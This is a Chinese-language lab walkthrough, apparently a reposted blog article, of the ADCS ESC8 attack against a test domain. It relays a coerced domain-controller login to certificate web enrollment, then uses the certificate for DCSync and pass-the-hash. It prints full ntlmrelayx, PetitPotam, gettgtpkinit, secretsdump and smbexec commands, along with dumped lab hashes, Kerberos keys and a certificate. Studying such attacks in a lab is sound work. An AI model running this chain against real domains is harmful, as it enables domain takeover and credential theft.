ADCS-ESC8

漏洞利用原因： 由于ADCS的http证书接口没有启用NTLM中继保护，因此其易受NTLM Relay攻击。而且Authorization HTTP 标头明确只允许通过 NTLM 身份验证，因此Kerberos协议无法使用。因此，攻击者可以利用NTLM Relay攻击ADCS证书服务。

在我们尝试使用域上的用户帐户进行一些攻击后。 在这一部分，我们将尝试在域中设置了 ADCS 的情况下进行攻击。

1.使用 petitpotam unauthenticated 和 ESC8 攻击获取 essos.local 上的域管理员，2.使用 certipy、bloodhound 和用户帐户枚举模板证书。3.利用以下攻击：certipy、esc1、esc2、esc3、esc4、esc6、certifried 和 shadow credentials。

ESC8 - coerce to domain admin

ESC8(ADCS Relay)

白皮书中一共提到19种攻击手法，大致可以分为:

•窃取类•权限维持类•权限提升类

其中权限维持类又可以分为个体权限维持与域的权限维持，类似我们常见的白银票据和黄金票据。在这些关于证书服务的攻击中威胁比较大的被称作ESC8 也被叫做ADCS Relay。

原因

ADCS的http证书接口允许通过NTLM身份验证，未但是启用NTLM中继保护，因此攻击者可以利用NTLM Relay攻击ADCS证书服务。攻击者可以在一个默认安装了证书web服务的域环境中，使用普通用户凭据，直接获取到域管权限。

大致思路

结合 PetitPotam 与 ESC8，获取证书后可以为用户/机器请求 TGT / TGS 票据。能够实现从低权限域用户提升到域管理员权限，从而实现对整个域环境的控制。

•攻击者利用打印机漏洞，强制域控使用机器账户发起ntlm认证请求•之后讲请求relay到证书服务的http接口，通过验证获得域机器账户的身份•利用证书模板为机器用户申请证书，方便之后持久性获取该用户权限•最后利用申请到的证书进行认证，就能拿到机器用户也就是域控的权限。

ADCS ESC8 也被叫做ADCS Relay，是目前ADCS里面利用最广的一个洞

1- 通过证书查找证书服务器
2- ntlmrelayx监听
3- 触发回连
4- ntlmrelayx成功进行relay，并获取到证书信息
5- 获取域管

在lab中实际操作一下：

•1-检查网络注册是否启动并运行：http://192.168.56.23/certsrv/certfnsh.asp，服务器要求进行身份验证，所以web enrollement正常运行

•添加一个listener以使用 impacket ntlmrelayx 将 SMB 身份验证中继到 HTTP

sudo python3 ntlmrelayx.py -t http://192.168.56.23/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

•使用petitpotam unauthenticated运行coerce

proxychains git clone https://github.com/topotam/PetitPotam PetitPotam

sudo python3 PetitPotam.py 192.168.56.109 meereen.essos.local

•ntlmrelayx 会将身份验证中继到 web 注册并获取证书•Base64 certificate of user MEEREEN$

将其保存到cert.b64

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

•使用该证书获取一个TGT

proxychains git clone https://github.com/dirkjanm/PKINITtools
sudo python3 gettgtpkinit.py -pfx-base64 $(cat ~/intranet-tools/cert.b64) 'essos.local'/'meereen$' 'meereen.ccache'

现在我们获得了 meereen 的 TGT，因此我们可以启动 DCsync 并获取所有 ntds.dit 内容。

sudo -s
export KRB5CCNAME=meereen.ccache
sudo python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
( 如果一些报错，尝试重新 python3 -m pip install . 重新安装依赖)
https://github.com/fortra/impacket/issues/1480
result:
wulala@wulala-VirtualBox:~/intranet-tools/PKINITtools$ sudo python3 /home/wulala/intranet-tools/myimpacket/examples/secretsdump.py -k -no-pass ESSOS.LOCAL/'meereen$'@meereen.essos.local
Impacket v0.10.1.dev1+20230511.163246.f3d0b9e5 - Copyright 2022 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd9c4766bf492a7eaa2a107e4fc08ed4:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
pnightmare:1116:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e:::
MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:a67ca990438d4a00ff68f68132c9bd77:::
BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:e2c501b3e0b070d53882282fd85ca801:::
removemiccomputer$:1115:aad3b435b51404eeaad3b435b51404ee:eddcfa8734a1607e95f556cad68863e3:::
SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:0a6998464700e2922302f6f81f10ebf3:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:c4cd2a397fc61aa61d4d1380dd56595a72b7ee20dd2fe38f9fab9af778e3ef2b
krbtgt:aes128-cts-hmac-sha1-96:41f8c81d6cc9ba1a51c5cef8dd6311ac
krbtgt:des-cbc-md5:6e8c4313204ce6e5
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
daenerys.targaryen:aes128-cts-hmac-sha1-96:eeb91a725e7c7d83bfc7970532f2b69c
daenerys.targaryen:des-cbc-md5:bc6ddf7ce60d29cd
viserys.targaryen:aes256-cts-hmac-sha1-96:b4124b8311d9d84ee45455bccbc48a108d366d5887b35428075b644e6724c96e
viserys.targaryen:aes128-cts-hmac-sha1-96:4b34e2537da4f1ac2d16135a5cb9bd3e
viserys.targaryen:des-cbc-md5:70528fa13bc1f2a1
khal.drogo:aes256-cts-hmac-sha1-96:2ef916a78335b11da896216ad6a4f3b1fd6276938d14070444900a75e5bf7eb4
khal.drogo:aes128-cts-hmac-sha1-96:7d76da251df8d5cec9bf3732e1f6c1ac
khal.drogo:des-cbc-md5:b5ec4c1032ef020d
jorah.mormont:aes256-cts-hmac-sha1-96:286398f9a9317f08acd3323e5cef90f9e84628c43597850e22d69c8402a26ece
jorah.mormont:aes128-cts-hmac-sha1-96:896e68f8c9ca6c608d3feb051f0de671
jorah.mormont:des-cbc-md5:b926916289464ffb
sql_svc:aes256-cts-hmac-sha1-96:ca26951b04c2d410864366d048d7b9cbb252a810007368a1afcf54adaa1c0516
sql_svc:aes128-cts-hmac-sha1-96:dc0da2bdf6dc56423074a4fd8a8fa5f8
sql_svc:des-cbc-md5:91d6b0df31b52a3d
pnightmare:aes256-cts-hmac-sha1-96:08da34ebff1dd974ef4694a80381ba0b91053db8c1ff3408c49b1ec870a355ae
pnightmare:aes128-cts-hmac-sha1-96:1e52001e6c4555756489ac2632ff1920
pnightmare:des-cbc-md5:5ef4f1d368f476ab
MEEREEN$:aes256-cts-hmac-sha1-96:7248a3826b3efeac32fda312fde539100eccc57502ec0a57774d3e1b3dd19806
MEEREEN$:aes128-cts-hmac-sha1-96:9c403c0ef15567e04f9837a9a0943c3b
MEEREEN$:des-cbc-md5:a107198062a7792f
BRAAVOS$:aes256-cts-hmac-sha1-96:bdadc570089f72f168bf52f289e0cb94c76a374bc2f0e48b18032f69daca10e8
BRAAVOS$:aes128-cts-hmac-sha1-96:99da663f7d94c43e1ed0dc9a0b636126
BRAAVOS$:des-cbc-md5:a10bf1b552aed9ae
removemiccomputer$:aes256-cts-hmac-sha1-96:3c5aa6e6535bfab734e3ec56dd3f0e1cf8d8dca0647be0fe7eed6910e15c77a2
removemiccomputer$:aes128-cts-hmac-sha1-96:ccac23f1c7c2c627351b64067d924a00
removemiccomputer$:des-cbc-md5:790191079e4316e3
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:a8da77f246071f6073f84ec5abb3688704130e7fc69da7f5301e41d93c161b39
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:752dbb82ba248e874dcac0192d1442d2
SEVENKINGDOMS$:des-cbc-md5:86e964f480c15b62
[*] Cleaning up... 

利用获取的HASH尝试一下

Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

sudo python3 /home/wulala/intranet-tools/myimpacket/examples/smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da' Administrator@meereen.essos.local

非常OK

原文始发于微信公众号（wulala520）：ADCS-ESC8